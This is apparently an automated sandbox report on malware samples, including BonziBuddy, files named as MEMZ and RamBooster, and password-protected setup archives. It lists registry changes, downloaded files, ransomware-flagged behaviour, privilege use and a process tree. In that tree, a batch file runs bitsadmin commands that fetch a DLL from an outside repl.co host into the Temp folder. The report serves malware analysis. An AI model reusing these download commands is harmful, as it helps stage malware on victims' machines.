Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66833FEB-8583-11D1-B16A-00C0F0283628}\ = "IButtonMenus"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD9DA660-8594-11D1-B16A-00C0F0283628}\ = "IComboItem"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E8671A8B-E5DD-11CD-836C-0000C0C14E92}\1.0\0\win32	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA665-8594-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{00E212A0-E66D-11CD-836C-0000C0C14E92}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EB52CF7B-3917-11CE-80FB-0000C0C14E92}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31E-5C6E-11D1-9EC1-00C04FD7081F}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{14E27A70-69F0-11CE-9425-0000C0C14E92}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Agent.Character2.2\ = "Microsoft Agent Character File"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{53FA8D4D-2CDD-11D3-9DD0-D3CD4078982A}\ProgID\ = "ActiveSkin.SkinScrollBar.1"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{53FA8D31-2CDD-11D3-9DD0-D3CD4078982A}\TypeLib\ = "{972DE6B5-8B09-11D2-B652-A1FD6CC34260}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D6589123-FC70-11D0-AC94-00C04FD97575}\2.0\FLAGS	AgentSvr.exe

NTFS ADS 8 IoCs

Processes:

firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\memz-master.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Bonzi.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\ActiveSatupH41__Pass-2023.rar:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\7z2201-x64.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\nagogy.bat:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Pass_55551-CompleteSetupA7.rar:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\RamBooster20.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\framxpro.zip:Zone.Identifier	firefox.exe

Opens file in notepad (likely ransom note) 2 IoCs
ransomware

Processes:

NOTEPAD.EXENOTEPAD.EXE

pid process

3520 NOTEPAD.EXE
4124 NOTEPAD.EXE

pid	process
3520	NOTEPAD.EXE
4124	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Satup.exeSatup.exezsdfvrtuipojmnfgd.exetaskmgr.exe

pid	process
4776	Satup.exe
4776	Satup.exe
5968	Satup.exe
5968	Satup.exe
6116	zsdfvrtuipojmnfgd.exe
6116	zsdfvrtuipojmnfgd.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

OpenWith.exeOpenWith.exetaskmgr.exe

pid process

3448 OpenWith.exe
3228 OpenWith.exe
6812 taskmgr.exe

pid	process
3448	OpenWith.exe
3228	OpenWith.exe
6812	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

Processes:

msedge.exe

pid	process
6256	msedge.exe
6256	msedge.exe
6256	msedge.exe
6256	msedge.exe
6256	msedge.exe
6256	msedge.exe
6256	msedge.exe
6256	msedge.exe
6256	msedge.exe
6256	msedge.exe
6256	msedge.exe
6256	msedge.exe
6256	msedge.exe
6256	msedge.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

firefox.exeAUDIODG.EXE7z2201-x64.exe7zG.exe7zG.exe7zG.exe7zG.exemsedge.exetaskmgr.exe

description	pid	process
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: 33	2644	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2644	AUDIODG.EXE
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	5984	7z2201-x64.exe
Token: SeDebugPrivilege	5984	7z2201-x64.exe
Token: SeDebugPrivilege	5984	7z2201-x64.exe
Token: SeDebugPrivilege	5984	7z2201-x64.exe
Token: SeDebugPrivilege	5984	7z2201-x64.exe
Token: SeRestorePrivilege	404	7zG.exe
Token: 35	404	7zG.exe
Token: SeSecurityPrivilege	404	7zG.exe
Token: SeSecurityPrivilege	404	7zG.exe
Token: SeRestorePrivilege	2464	7zG.exe
Token: 35	2464	7zG.exe
Token: SeSecurityPrivilege	2464	7zG.exe
Token: SeSecurityPrivilege	2464	7zG.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeRestorePrivilege	2108	7zG.exe
Token: 35	2108	7zG.exe
Token: SeSecurityPrivilege	2108	7zG.exe
Token: SeSecurityPrivilege	2108	7zG.exe
Token: SeRestorePrivilege	3272	7zG.exe
Token: 35	3272	7zG.exe
Token: SeSecurityPrivilege	3272	7zG.exe
Token: SeSecurityPrivilege	3272	7zG.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	5448	msedge.exe
Token: SeDebugPrivilege	5448	msedge.exe
Token: SeDebugPrivilege	5448	msedge.exe
Token: SeDebugPrivilege	5448	msedge.exe
Token: SeDebugPrivilege	5448	msedge.exe
Token: SeDebugPrivilege	6812	taskmgr.exe
Token: SeSystemProfilePrivilege	6812	taskmgr.exe
Token: SeCreateGlobalPrivilege	6812	taskmgr.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

firefox.exe7zG.exe7zG.exe7zG.exe7zG.exetaskmgr.exeRambooster.exe

pid	process
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
404	7zG.exe
2464	7zG.exe
4956	firefox.exe
4956	firefox.exe
2108	7zG.exe
3272	7zG.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
5432	Rambooster.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

firefox.exetaskmgr.exeRambooster.exe

pid	process
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
6812	taskmgr.exe
5432	Rambooster.exe
6812	taskmgr.exe
5432	Rambooster.exe
6812	taskmgr.exe
5432	Rambooster.exe
6812	taskmgr.exe
5432	Rambooster.exe

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

firefox.exeOpenWith.exe7z2201-x64.exeOpenWith.exe

pid	process
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
3448	OpenWith.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
5984	7z2201-x64.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe
3228	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exefirefox.exefirefox.exe

description	pid	process	target process
PID 1916 wrote to memory of 5064	1916	cmd.exe	bitsadmin.exe
PID 1916 wrote to memory of 5064	1916	cmd.exe	bitsadmin.exe
PID 1916 wrote to memory of 4364	1916	cmd.exe	bitsadmin.exe
PID 1916 wrote to memory of 4364	1916	cmd.exe	bitsadmin.exe
PID 3372 wrote to memory of 4956	3372	firefox.exe	firefox.exe
PID 3372 wrote to memory of 4956	3372	firefox.exe	firefox.exe
PID 3372 wrote to memory of 4956	3372	firefox.exe	firefox.exe
PID 3372 wrote to memory of 4956	3372	firefox.exe	firefox.exe
PID 3372 wrote to memory of 4956	3372	firefox.exe	firefox.exe
PID 3372 wrote to memory of 4956	3372	firefox.exe	firefox.exe
PID 3372 wrote to memory of 4956	3372	firefox.exe	firefox.exe
PID 3372 wrote to memory of 4956	3372	firefox.exe	firefox.exe
PID 3372 wrote to memory of 4956	3372	firefox.exe	firefox.exe
PID 3372 wrote to memory of 4956	3372	firefox.exe	firefox.exe
PID 3372 wrote to memory of 4956	3372	firefox.exe	firefox.exe
PID 4956 wrote to memory of 1216	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 1216	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 3004	4956	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\nagogy.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1916

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer "Downloading libcurl-x64.def" "https://cdn-1.thughunter.repl.co/cdn/libcurl-x64.def" "C:\Users\Admin\AppData\Local\Temp\libcurl-x64.def"
2⤵
- Download via BitsAdmin
PID:5064

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer "Downloading libcurl-x64.dll" "https://cdn-1.thughunter.repl.co/cdn/libcurl-x64.dll" "C:\Users\Admin\AppData\Local\Temp\libcurl-x64.dll"
2⤵
- Download via BitsAdmin
PID:4364

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3372

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4956

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.0.590405691\343601749" -parentBuildID 20221007134813 -prefsHandle 1820 -prefMapHandle 1812 -prefsLen 20890 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee2c7ea4-1fe7-43e3-a570-41f50b74e8ea} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 1900 145d19a5b58 gpu
3⤵
PID:1216

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.1.319440654\320496890" -parentBuildID 20221007134813 -prefsHandle 2288 -prefMapHandle 2284 -prefsLen 20926 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80fd1ed9-9182-4c47-93bd-911feedf499e} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 2300 145c3971f58 socket
3⤵
PID:3004

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.2.469196980\619604302" -childID 1 -isForBrowser -prefsHandle 3252 -prefMapHandle 3248 -prefsLen 21074 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da57f18b-2f53-46d9-99c5-b2678b463b76} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 3260 145d4604d58 tab
3⤵
PID:1428

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.3.527360141\1252561009" -childID 2 -isForBrowser -prefsHandle 1268 -prefMapHandle 1460 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1328ef28-06ef-49f7-b52d-a42729528657} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 3076 145c396a858 tab
3⤵
PID:1076

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.4.410625294\871073456" -childID 3 -isForBrowser -prefsHandle 4052 -prefMapHandle 4048 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55d4d659-b32f-4c9f-b418-577ad9f99413} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 4060 145d57a0058 tab
3⤵
PID:1144

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.7.513439981\1220563688" -childID 6 -isForBrowser -prefsHandle 5352 -prefMapHandle 5356 -prefsLen 26659 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46488f8b-3592-4288-8fc1-d55d6fa05dbf} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5344 145d7036358 tab
3⤵
PID:2868

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.6.1433410730\919361450" -childID 5 -isForBrowser -prefsHandle 5160 -prefMapHandle 5164 -prefsLen 26659 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d98c464c-183f-4bd5-a2ff-c187e687d9fd} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5152 145d7035758 tab
3⤵
PID:2872

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.5.1919069227\971377658" -childID 4 -isForBrowser -prefsHandle 5000 -prefMapHandle 4756 -prefsLen 26659 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f531e217-0e7e-42e5-b770-f9c3d8cde89f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5016 145d6cbe158 tab
3⤵
PID:1708

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.8.1302829187\522786846" -childID 7 -isForBrowser -prefsHandle 4504 -prefMapHandle 3592 -prefsLen 27195 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d70d2599-0676-44b9-b034-89b4f44c802f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 4968 145d874fe58 tab
3⤵
PID:4236

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.9.315621588\399214339" -parentBuildID 20221007134813 -prefsHandle 6080 -prefMapHandle 6076 -prefsLen 27195 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0dc31ea-e238-488a-b1f7-19b2867b7824} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6092 145d8cb0f58 rdd
3⤵
PID:2916

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.10.1081677874\928621025" -childID 8 -isForBrowser -prefsHandle 6220 -prefMapHandle 6216 -prefsLen 27195 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {871e0c4e-a139-4f78-b401-fc1711a5bfb2} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6232 145d8eb9e58 tab
3⤵
PID:3776

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.11.1734537972\752406857" -childID 9 -isForBrowser -prefsHandle 5152 -prefMapHandle 5228 -prefsLen 27195 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2d517d7-b3b6-4771-8b14-690c30684f9e} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5320 145d91a1558 tab
3⤵
PID:5140

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.12.1101394244\1344092220" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 9792 -prefMapHandle 5520 -prefsLen 27195 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f66975b-6dc9-4dc5-a045-8ad3220af055} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 9788 145d91a3058 utility
3⤵
PID:5320

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.13.1943606903\674615712" -childID 10 -isForBrowser -prefsHandle 5024 -prefMapHandle 3144 -prefsLen 27195 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37f85b57-39a9-423d-a887-a27a2c1f2b3f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 4484 145d9106858 tab
3⤵
PID:5652

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.14.1697810868\391316880" -childID 11 -isForBrowser -prefsHandle 9508 -prefMapHandle 9504 -prefsLen 27195 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0840de51-67ca-4209-97e5-edc5477d5165} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5352 145d87e2e58 tab
3⤵
PID:5656

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.15.1279441654\594189479" -childID 12 -isForBrowser -prefsHandle 6252 -prefMapHandle 6284 -prefsLen 30379 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f34a51a9-c63f-4e14-b30e-06e946f1e0d2} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6272 145d68adf58 tab
3⤵
PID:4604

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.16.1113545177\728801324" -childID 13 -isForBrowser -prefsHandle 8816 -prefMapHandle 8732 -prefsLen 30379 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {85b7f0d1-3a09-432c-a477-971b0df9a379} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8800 145c3930558 tab
3⤵
PID:2032

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.17.556646473\1752308156" -childID 14 -isForBrowser -prefsHandle 8844 -prefMapHandle 9256 -prefsLen 30379 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e85dcbbe-ae29-489d-bf61-d4b69d75d9d8} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 9488 145d8ed5258 tab
3⤵
PID:5588

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.18.18778136\1498268139" -childID 15 -isForBrowser -prefsHandle 8544 -prefMapHandle 8548 -prefsLen 30379 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa3553e2-d5f8-43fc-b843-00e02261c38b} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 9596 145d8978b58 tab
3⤵
PID:2296

